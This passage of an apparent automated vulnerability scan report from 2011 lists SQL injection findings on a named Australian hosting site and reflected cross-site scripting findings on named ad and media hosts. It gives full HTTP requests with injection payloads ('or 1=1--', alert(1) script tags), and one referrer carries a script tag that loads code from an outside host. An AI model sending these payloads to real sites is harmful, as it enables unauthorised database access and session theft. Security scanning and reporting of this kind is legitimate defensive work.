<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /modules/mod_fpslideshow19827343'%20or%201%3d2--%20/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:02:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:02:50 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23748
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/modules/mod_fpslideshow19827343' or 1=2-- /mod_fpslideshow/templates/Uncut/template_css.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_cs
...[SNIP]...

1.12. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 87153619'%20or%201%3d1--%20 and 87153619'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpslideshow/mod_fpslideshow87153619'%20or%201%3d1--%20/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:25 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /modules/mod_fpslideshow/mod_fpslideshow87153619'%20or%201%3d2--%20/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:03:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:26 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23748
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow87153619' or 1=2-- /templates/Uncut/template_css.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_cs
...[SNIP]...

1.13. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 16320573'%20or%201%3d1--%20 and 16320573'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpslideshow/mod_fpslideshow/templates16320573'%20or%201%3d1--%20/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:59 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /modules/mod_fpslideshow/mod_fpslideshow/templates16320573'%20or%201%3d2--%20/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:04:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23748
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates16320573' or 1=2-- /Uncut/template_css.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_cs
...[SNIP]...

1.14. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 52193765'%20or%201%3d1--%20 and 52193765'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut52193765'%20or%201%3d1--%20/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:04:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:34 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut52193765'%20or%201%3d2--%20/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:04:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:35 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23748
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut52193765' or 1=2-- /template_css.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_cs
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 25 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [hcpage2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The value of the hcpage2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c89c3'%3balert(1)//61345588e2d was submitted in the hcpage2 parameter. This input was echoed as c89c3';alert(1)//61345588e2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ver.adhd_search/slideshow/womensymptoms;hcpage2=c89c3'%3balert(1)//61345588e2d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 424
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 01:59:15 GMT
Expires: Tue, 19 Jul 2011 01:59:15 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b49/0/0/%2a/v;231426503;0-0;0;65456586;3454-728/90;43051775/43069562/1;;~okv=;hcpage2=c89c3';alert(1)//61345588e2d;~aopt=2/1/ff/0;~sscs=%3fhttp://www.communityinvitations.com/html.pro?ID=1026&said=mc123&csid=hc11&pcid=HC">
...[SNIP]...

2.2. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [ugc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The value of the ugc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a77da'%3balert(1)//130646459df was submitted in the ugc parameter. This input was echoed as a77da';alert(1)//130646459df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ver.adhd_search/slideshow/womensymptoms;ugc=a77da'%3balert(1)//130646459df HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 420
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 01:58:44 GMT
Expires: Tue, 19 Jul 2011 01:58:44 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b49/0/0/%2a/v;231426503;0-0;0;65456586;3454-728/90;43051775/43069562/1;;~okv=;ugc=a77da';alert(1)//130646459df;~aopt=2/1/ff/0;~sscs=%3fhttp://www.communityinvitations.com/html.pro?ID=1026&said=mc123&csid=hc11&pcid=HC">
...[SNIP]...

2.3. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload dbcf9<script>alert(1)</script>61fc8dfb92f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//www.scout.com/search.aspx%3Fs%3D143%26p%3D19%26sitesearch%3Dscout.com%26q%3D1%253CScRiPt%252Fxss%2520src%253Dhttp%253A%252F%252Fxss.cx%252Fcx.js%253F964407%253E%253C%252FScRiPt%253E&format=json&callback=$.analytics.reportdbcf9<script>alert(1)</script>61fc8dfb92f HTTP/1.1
Host: cdn-cms.scout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scout.com/search.aspx?s=143&p=19&sitesearch=scout.com&q=1%3CScRiPt%2Fxss%20src%3Dhttp%3A%2F%2Fxss.cx%2Fcx.js%3F964407%3E%3C%2FScRiPt%3E
Cookie: __utma=202704078.1310038920.1308590023.1308597903.1310666427.3; __utmz=202704078.1310666427.3.3.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; UnicaNIODID=pRNfMHC9Ow1-XCX0Xfv; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.38747
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 337
Date: Tue, 19 Jul 2011 12:04:59 GMT
Connection: close
Akamai: True

